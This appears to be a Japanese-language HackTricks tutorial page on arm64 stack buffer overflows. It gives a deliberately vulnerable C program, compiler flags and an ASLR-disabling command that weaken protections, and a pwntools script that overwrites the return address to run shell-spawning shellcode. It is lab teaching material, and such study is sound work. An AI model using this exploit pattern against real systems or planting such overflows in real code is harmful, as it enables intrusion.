Stack Shellcode - arm64

Reading time: 4 minutes

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

arm64の入門については以下を参照してください:

Introduction to ARM64v8

Linux

コード

c
#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

pie、canary、nxなしでコンパイル:

bash
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

ASLRなし & canaryなし - Stack Overflow

ASLRを無効にするには、次を実行:

bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

bofのoffsetを取得するには、offset of the bof check this link を参照してください。

Exploit:

python
from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

ここで唯一「複雑」なのは呼び出すstack上のアドレスを見つけることです。私の場合、gdbで見つけたアドレスを使ってexploitを生成しましたが、実際にexploitingすると動作しませんでした(stackアドレスが少し変わっていたため)。

生成された core file (gdb ./bog ./core) を開き、shellcodeの開始位置の実際のアドレスを確認しました。

macOS

tip

macOSではNXを無効化することはできません。arm64ではこのモードがハードウェアレベルで実装されており無効化できないため、macOSでstack上にshellcodeを置く例は見つからないでしょう。

macOSのret2winの例は次を参照:

Ret2win - arm64

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする